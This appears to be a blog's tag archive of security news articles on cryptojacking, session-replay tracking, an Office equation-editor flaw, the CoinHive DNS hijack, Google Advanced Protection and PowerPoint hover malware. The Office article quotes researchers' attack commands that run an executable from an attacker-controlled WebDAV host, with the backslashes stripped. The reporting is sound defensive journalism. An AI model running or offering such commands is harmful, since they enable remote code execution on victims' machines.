Tag Archives: when

Thousands of Government Websites Hacked to Mine Cryptocurrencies

cryptojacking-website-hacked

There was a time when hackers simply defaced websites to get attention, then they started hijacking them to spread banking trojan and ransomware, and now the trend has shifted towards injecting scripts into sites to mine cryptocurrencies.

Thousands of government websites around the world have been found infected with a specific script that secretly forces visitors’ computers to mine cryptocurrency for attackers.

The cryptocurrency mining script injection found on over 4,000 websites, including those belonging to UK’s National Health Service (NHS), the Student Loan Company, and data protection watchdog Information Commissioner’s Office (ICO), Queensland legislation, as well as the US government’s court system.

Users who visited the hacked websites immediately had their computers’ processing power hijacked, also known as cryptojacking, to mine cryptocurrency without their knowledge, potentially generating profits for the unknown hacker or group of hackers.

It turns out that hackers managed to hijack a popular third-party accessibility plugin called “Browsealoud,” used by all these affected websites, and injected their cryptocurrency-mining script into its code.

Browsealoud is a popular third-party browser plugin that helps blind and partially-sighted users access the web by converting site text to audio.

The script that was inserted into the compromised Browsealoud software belongs to CoinHive—a browser-based Monero mining service that offers website administrators to earn revenue by utilizing CPU resources of visitors.

The mining software was found in more than 4,200 websites, including The City University of New York (cuny.edu), Uncle Sam’s court information portal (uscourts.gov), the UK’s Student Loans Company (slc.co.uk), privacy watchdog The Information Commissioner’s Office (ico.org.uk) and the Financial Ombudsman Service (financial-ombudsman.org.uk), UK NHS services, Manchester.gov.uk, NHSinform.scot, agriculture.gov.ie, Croydon.gov.uk, ouh.nhs.uk, legislation.qld.gov.au, the list goes on.

The full list of affected websites can be found here.

After UK-based infosec consultant Scott Helme raised the alarm about this hack when one of his friends mentioned getting anti-virus alerts on a UK Government website, BrowseAloud’s operator Texthelp took down its site to resolve the issue.

Here’s what Texthelp’s chief technology officer Martin McKay said in a blog post:

“In light of other recent cyber attacks all over the world, we have been preparing for such an incident for the last year. Our data security action plan was actioned straight away and was effective, the risk was mitigated for all customers within a period of four hours.”

“Texthelp has in place continuously automated security tests for Browsealoud – these tests detected the modified file, and as a result, the product was taken offline.”

This action eventually removed Browsealoud from all websites immediately, addressing the security issue without its customers having to take any action.

The company also assured that “no customer data has been accessed or lost,” and that its customers will receive a further update as soon as the security investigation gets completed.

Russian Scientists Arrested for Using Nuclear Weapon Facility to Mine Bitcoins

bitcoin-mining

Two days ago when infosec bods claimed to have uncovered what’s believed to be the first case of a SCADA network (a water utility) infected with cryptocurrency-mining malware, a batch of journalists accused other authors of making fear-mongering headlines, taunting that the next headline could be about cryptocurrency-miner detected in a nuclear plant.

It seems that now they have to run a story themselves with such headlines on their website because Russian Interfax News Agency yesterday reported that several scientists at Russia’s top nuclear research facility had been arrested for mining cryptocurrency with “office computing resources.”

The suspects work as engineers at the Russian Federation Nuclear Center facility—also known as the All-Russian Research Institute of Experimental Physics—which works on developing nuclear weapons.

The center is located in Sarov, Sarov is still a restricted area with high security. It is also the birthplace of the Soviet Union’s first nuclear bomb.

In 2011, the Russian Federation Nuclear Center switched on a new supercomputer with a capacity of 1 petaflop, making it the twelfth most powerful in the world at the time.

According to Russian media reports, the engineers had tried to use one of Russia’s most powerful supercomputers housed in the Federal Nuclear Center to mine Bitcoins.

The suspects were caught red-handed while attempting to connect the lab’s supercomputer to the internet, which was supposed to be offline to ensure security, the nuclear center’s security department was alerted.

Once caught, the engineers were handed over to the Federal Security Service (FSB).

“There has been an unsanctioned attempt to use computer facilities for private purposes including so-called mining,” Tatyana Zalesskaya, head of the Institute’s press service, told Interfax news agency. 

“Their activities were stopped in time. The bungling miners have been detained by the competent authorities. As far as I know, a criminal case has been opened regarding them,” Zalesskaya added, without revealing the exact number of employees detained.

The Federal Security Service (FSB) has yet to issue a statement on the arrests and criminal charges.

Cryptocurrency has gained tremendous popularity over the past year. Mining a single Bitcoin is not an ice cakewalk, as it requires an enormous amount of computational power and huge amounts of energy.

According to media reports, Russia is becoming a hotbed of cryptocurrency mining due to its low-cost energy reserves. One Russian businessman, Alexey Kolesnik, reportedly also bought two power stations exclusively to generate electricity for Bitcoin-mining data centers.

Over 400 Popular Sites Record Your Every Keystroke and Mouse Movement

website-keylogger

How many times it has happened to you when you look for something online and the next moment you find its advertisement on almost every other web page or social media site you visit?

Web-tracking is not new.

Most of the websites log its users’ online activities, but a recent study from Princeton University has suggested that hundreds of sites record your every move online, including your searches, scrolling behavior, keystrokes and every movement.

Researchers from Princeton University’s Centre for Information Technology Policy (CITP) analyzed the Alexa top 50,000 websites in the world and found that 482 sites, many of which are high profile, are using a new web-tracking technique to track every move of their users.

Dubbed “Session Replay,” the technique is used even by most popular websites, including The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, and WordPress, to record every single movement a visitor does while navigating a web page, and this incredibly extensive data is then sent off to a third party for analysis.

“Session replay scripts” are usually designed to gather data regarding user engagement that can be used by website developers to improve the end-user experience.

However, what’s particularly concerning is that these scripts record beyond the information you purposely give to a website—which also includes the text you type out while filing a form and then delete before hitting ‘Submit.

“More and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behaviour, along with the entire contents of the pages you visit, and send them to third-party servers,” Princeton researcher Steven Englehardt wrote in a blog post under the No Boundaries banner.

“Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behaviour.”

Most troubling part is that the information collected by session replay scripts cannot “reasonably be expected to be kept anonymous.” Some of the companies that provide session replay software even allow website owners to explicitly link recordings to a user’s real identity.

Services Offering Session Replay Could Capture Your Passwords

keylogger-website
The researchers looked at some of the leading companies, including FullStory, SessionCam, Clicktale, Smartlook, UserReplay, Hotjar, and Yandex, which offer session replay software services, and found that most of these services directly exclude password input fields from recording.

However, most of the times mobile-friendly login forms that use text inputs to store unmasked passwords are not redacted on the recordings, which ends up revealing your sensitive data, including passwords, credit card numbers, and even credit card security codes.

This data is then shared with a third party for analysis, along with other gathered information.

“We found at least one website where the password entered into a registration form leaked to SessionCam, even if the form is never submitted,” the researcher said.

The researchers also shared a video which shows how much detail these session recording scripts can collect on a website’s visitor.

World’s Top Websites Record Your Every Keystroke

There are a lot of significant firms using session replay scripts even with the best of intentions, but since this data is being collected without the user’s knowledge or visual indication to the user, these websites are just downplaying users’ privacy.

Also, there is always potential for such data to fall into the wrong hands.

Besides the fact that this practice is happening without people’s knowledge, the people in charge of some of the websites also did not even know that the script was implemented, which makes the matter a little scary.

Companies using such software included The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, WordPress, Samsung, CBS News, the Telegraph, Reuters, and US retail giant Home Depot, among many others.

So, if you are logging in one of these websites, you should expect that everything you write, type, or move is being recorded.

17-Year-Old MS Office Flaw Lets Hackers Install Malware Without User Interaction

microsoft-office-remote-code-execution

You should be extra careful when opening files in MS Office.

When the world is still dealing with the threat of ‘unpatched’ Microsoft Office’s built-in DDE feature, researchers have uncovered a serious issue with another Office component that could allow attackers to remotely install malware on targeted computers.

The vulnerability is a memory-corruption issue that resides in all versions of Microsoft Office released in the past 17 years, including Microsoft Office 365, and works against all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

Discovered by the security researchers at Embedi, the vulnerability leads to remote code execution, allowing an unauthenticated, remote attacker to execute malicious code on a targeted system without requiring user interaction after opening a malicious document.

The vulnerability, identified as CVE-2017-11882, resides in EQNEDT32.EXE, an MS Office component which is responsible for insertion and editing of equations (OLE objects) in documents.

microsoft-office-exploit

However, due to improper memory operations, the component fails to properly handle objects in the memory, corrupting it in such a way that the attacker could execute malicious code in the context of the logged-in user.

Seventeen years ago, EQNEDT32.EXE was introduced in Microsoft Office 2000 and had been kept in all versions released after Microsoft Office 2007 in order to ensure the software remains compatible with documents of older versions.

DEMO: Exploitation Allows Full System Take Over

Exploitation of this vulnerability requires opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.

This vulnerability could be exploited to take complete control over a system when combined with Windows Kernel privilege escalation exploits (like CVE-2017-11847).

Possible Attack Scenario:

While explaining the scope of the vulnerability, Embedi researchers suggested several attack scenarios listed below:

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).”

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \attacker_ipff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that, an attacker can start an executable file from the WebDAV server by using the \attacker_ipff1.exe command. The starting mechanism of an executable file is similar to that of the \live.sysinternals.comtools service.”

Protection Against Microsoft Office Vulnerability

With this month’s Patch release, Microsoft has addressed this vulnerability by changing how the affected software handles objects in memory.

So, users are strongly recommended to apply November security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers.

Since this component has a number of security issues which can be easily exploited, disabling it could be the best way to ensure your system security.

Users can run the following command in the command prompt to disable registering of the component in Windows registry:

reg add “HKLMSOFTWAREMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, run the following command:

reg add “HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

Besides this, users should also enable Protected View (Microsoft Office sandbox) to prevent active content execution (OLE/ActiveX/Macro).

Hacker Hijacks CoinHive’s DNS to Mine Cryptocurrency Using Thousands of Websites

Hacker Hijacks CoinHive's DNS to Mine Cryptocurrency Using Thousands of Websites

When yesterday I was reporting about the sudden outbreak of another global ransomware attack ‘Bad Rabbit,’ I thought what could be worse than this?

Then late last night I got my answer with a notification that Coinhive has been hacked — a popular browser-based service that offers website owners to embed a JavaScript to utilise their site visitors’ CPUs power to mine the Monero cryptocurrency for monetisation.

Reportedly an unknown hacker managed to hijack Coinhive’s CloudFlare account that allowed him/her to modify its DNS servers and replace Coinhive’s official JavaScript code embedded into thousands of websites with a malicious version.

https://coin-hive[.]com/lib/coinhive.min.js

Hacker Reused Leaked Password from 2014 Data Breach

Apparently, hacker reused an old password to access Coinhive’s CloudFlare account that was leaked in the Kickstarter data breach in 2014.

“Tonight, Oct. 23th at around 22:00 GMT our account for our DNS provider (Cloudflare) has been accessed by an attacker. The DNS records for coinhive.com have been manipulated to redirect requests for the coinhive.min.js to a third party server.” Coinhive said in a blog post today.

“This third-party server hosted a modified version of the JavaScript file with a hardcoded site key.”

As a result, thousands of sites using coinhive script were tricked for at least six hours into loading a modified code that mined Monero cryptocurrency for the hacker rather than the actual site owners.

“We have learned hard lessons about security and used 2FA [Two-factor authentication] and unique passwords for all services since, but we neglected to update our years old Cloudflare account.”

Your Web-Browsers Could Be Mining Cryptocurrencies Secretly for Strangers

Coinhive gained media attention in last weeks after world’s popular torrent download website, The Pirate Bay, caught secretly using this browser-based cryptocurrency miner on its site.

Immediately after that more than thousands of other websites also started using Coinhive as an alternative monetisation model by utilising their visitors’ CPU processing power to mine digital currencies.

Even hackers are also using Coinhive like services to make money from compromised websites by injecting a script secretly.

Well, now the company is also looking ways to reimburse its users for the lost revenue due to breach.

How to Block Websites From Hijacking Your CPU to Mine Cryptocoins

Due to concerns mentioned above, some Antivirus products, including Malwarebytes and Kaspersky, have also started blocking Coinhive script to prevent their customers from unauthorised mining and extensive CPU usage.

You can also install, No Coin Or minerBlock, small open source browser extensions (plug-ins) that block coin miners such as Coinhive.

Enable Google’s New “Advanced Protection” If You Don’t Want to Get Hacked

google-advanced-protection

It is good to be paranoid when it comes to cybersecurity.

Google already provides various advanced features such as login alerts and two-factor authentication to keep your Google account secure.

However, if you are extra paranoid, Google has just introduced its strongest ever security feature, called “Advanced Protection,” which makes it easier for users, who are usually at high risk of targeted online attacks, to lock down their Google accounts like never before.

“We took this unusual step because there is an overlooked minority of our users that are at particularly high risk of targeted online attacks,” the company said in a blog post announcing the program on Tuesday. 

“For example, these might be campaign staffers preparing for an upcoming election, journalists who need to protect the confidentiality of their sources, or people in abusive relationships seeking safety.”

Even if a hacker somehow gets your password—using advanced phishing attacks, zero-day exploits or spyware—and tries to access your Google account, they will not be able to get in.

To enable Google’s Advanced Protection feature, you will need two physical security keys that work with FIDO Universal 2nd Factor (U2F)—which offers a hardware-based two-factor authentication that does not require secret codes via SMS or emails.

google-advanced-protection-security-key

To log into your Google account from a computer or laptop will require a special USB stick while accessing from a smartphone or tablet will similarly require a Bluetooth-enabled dongle, paired with your phone.

“They [security devices] use public-key cryptography and digital signatures to prove to Google that it’s really you,” the post reads. “An attacker who does not have your Security Key is automatically blocked, even if they have your password.”

Google’s Advanced Protection offer three features to keep your account safe:

  1. Physical Security Key: Signing into your account requires a U2F security key, preventing other people (even with access to your password) from logging into your account.
  2. Limit data access and sharing: Enabling this feature allows only Google apps to get access to your account for now, though other trusted apps will be added over time.
  3. Blocking fraudulent account access: If you lose your U2F security key, the account recovery process will involve additional steps, “including additional reviews and requests for more details about why you’ve lost access to your account” to prevent fraudulent account access.

Advanced Protection feature is not designed for everyone, but only for people, like journalists, government officials and activists, who are at a higher risk of being targeted by government or sophisticated hackers and ready to sacrifice some convenience for substantially increased e-mail protection.

Currently, if you want to enrol in the Advanced Protection Program, you will need Google Chrome, since only Chrome supports the U2F standard for Security Keys. However, the technology expects other browsers to incorporate this feature soon.

Google Adds ESET Malware Detection to Chrome

google-chrome-eset-antivirus

Google has also made a notable change by partnering with anti-virus software firm ESET to expand the scope of malware detection and protection in its browser through the Chrome Cleanup feature.

Chrome Cleanup now has a malware detection engine from ESET, which works in tandem with Chrome’s sandbox technology.

“We can now detect and remove more unwanted software than ever before, meaning more people can benefit from Chrome Cleanup,” Google said in a blog post published Monday. 

“Note this new sandboxed engine is not a general-purpose antivirus—it only removes software that doesn’t comply with our unwanted software policy.”

You can sign-up for Google’s Advanced Protection here.

CVE-2017-9801

CVE-2017-9801 : When a call-site passes a subject for an email that contains line-breaks in Apache Commons Email 1.0 through 1.4, the ca

CVEdetails.com the ultimate security vulnerability data source

When a call-site passes a subject for an email that contains line-breaks in Apache Commons Email 1.0 through 1.4, the caller can add arbitrary SMTP headers.

Publish Date : 2017-08-07 Last Update Date : 2017-08-09


CVSS Scores & Vulnerability Types

CVSS Score

5.0

Confidentiality Impact None
(There is no impact to the confidentiality of the system.)
Integrity Impact Partial
(Modification of some system files or information is possible, but the attacker does not have control over what can be modified, or the scope of what the attacker can affect is limited.)
Availability Impact None
(There is no impact to the availability of the system.)
Access Complexity Low
(Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication Not required
(Authentication is not required to exploit the vulnerability.)
Gained Access None
Vulnerability Type(s)
CWE ID 20


Products Affected By CVE-2017-9801


Number Of Affected Versions By Product


References For CVE-2017-9801


Metasploit Modules Related To CVE-2017-9801

CVE is a registred trademark of the MITRE Corporation and the authoritative source of CVE content is
MITRE’s CVE web site.

CWE is a registred trademark of the MITRE Corporation and the authoritative source of CWE content is
MITRE’s CWE web site.

OVAL is a registered trademark of The MITRE Corporation and the authoritative source of OVAL content is
MITRE’s OVAL web site.

Use of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties, implied or otherwise, with regard to this information or its use.
Any use of this information is at the user’s risk.
It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content.
EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site.
ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT,
INDIRECT or any other kind of loss.

Powered by WPeMatico

Beware! This Microsoft PowerPoint Hack Installs Malware Without Requiring Macros

microsoft-powerpoint-macros-malware

Disable macros and always be extra careful when you manually enable it while opening Microsoft Office Word documents.

You might have heard of above-mentioned security warning multiple times on the Internet as hackers usually leverage this decade old macros-based hacking technique to hack computers through specially crafted Microsoft Office files, particularly Word, attached to spam emails.

But a new social engineering attack has been discovered in the wild, which doesn’t require users to enable macros; instead it executes malware on a targeted system using PowerShell commands embedded inside a PowerPoint (PPT) file.

Moreover, the malicious PowerShell code hidden inside the document triggers as soon as the victim moves/hovers a mouse over a link (as shown), which downloads an additional payload on the compromised machine — even without clicking it.

Researchers at Security firm SentinelOne have discovered that a group of hackers is using malicious PowerPoint files to distribute ‘Zusy,’ a banking Trojan, also known as ‘Tinba’ (Tiny Banker).

Discovered in 2012, Zusy is a banking trojan that targets financial websites and has the ability to sniff network traffic and perform Man-in-The-Browser attacks in order to inject additional forms into legit banking sites, asking victims to share more crucial data such as credit card numbers, TANs, and authentication tokens.

“A new variant of a malware called ‘Zusy’ has been found in the wild spreading as a PowerPoint file attached to spam emails with titles like ‘Purchase Order #130527’ and ‘Confirmation.’ It’s interesting because it doesn’t require the user to enable macros to execute,” researchers at SentinelOne Labs say in a blog post.

The PowerPoint files have been distributed through spam emails with subjects like “Purchase Order” and “Confirmation,” which when opened, displays the text “Loading…Please Wait” as a hyperlink.

microsoft-powerpoint-macros-malware

When a user hovers the mouse over the link it automatically tries to trigger the PowerShell code, but the Protected View security feature that comes enabled by default in most supported versions of Office, including Office 2013 and Office 2010, displays a severe warning and prompts them to enable or disable the content.

If the user neglects this warning and allows the content to be viewed, the malicious program will connect to the “cccn.nl” domain name, from where it downloads and executes a file, which is eventually responsible for the delivery of a new variant of the banking Trojan called Zusy.

“Users might still somehow enable external programs because they’re lazy, in a hurry, or they’re only used to blocking macros,” SentinelOne Labs says. “Also, some configurations may possibly be more permissive in executing external programs than they are with macros.”

Another security researcher, Ruben Daniel Dodge, also analyzed this new attack and confirmed that this newly discovered attack does not rely on Macros, Javascript or VBA for the execution method.

“This is accomplished by an element definition for a hover action. This hover action is setup to execute a program in PowerPoint once the user mouses over the text. In the resources definition of slide1 ‘rID2’ is defined as a hyperlink where the target is a PowerShell command,” Dodge said.

The security firm also said that the attack doesn’t work if the malicious file is opened in PowerPoint Viewer, which refuses to execute the program. But the technique could still be efficient in some cases.

Powered by WPeMatico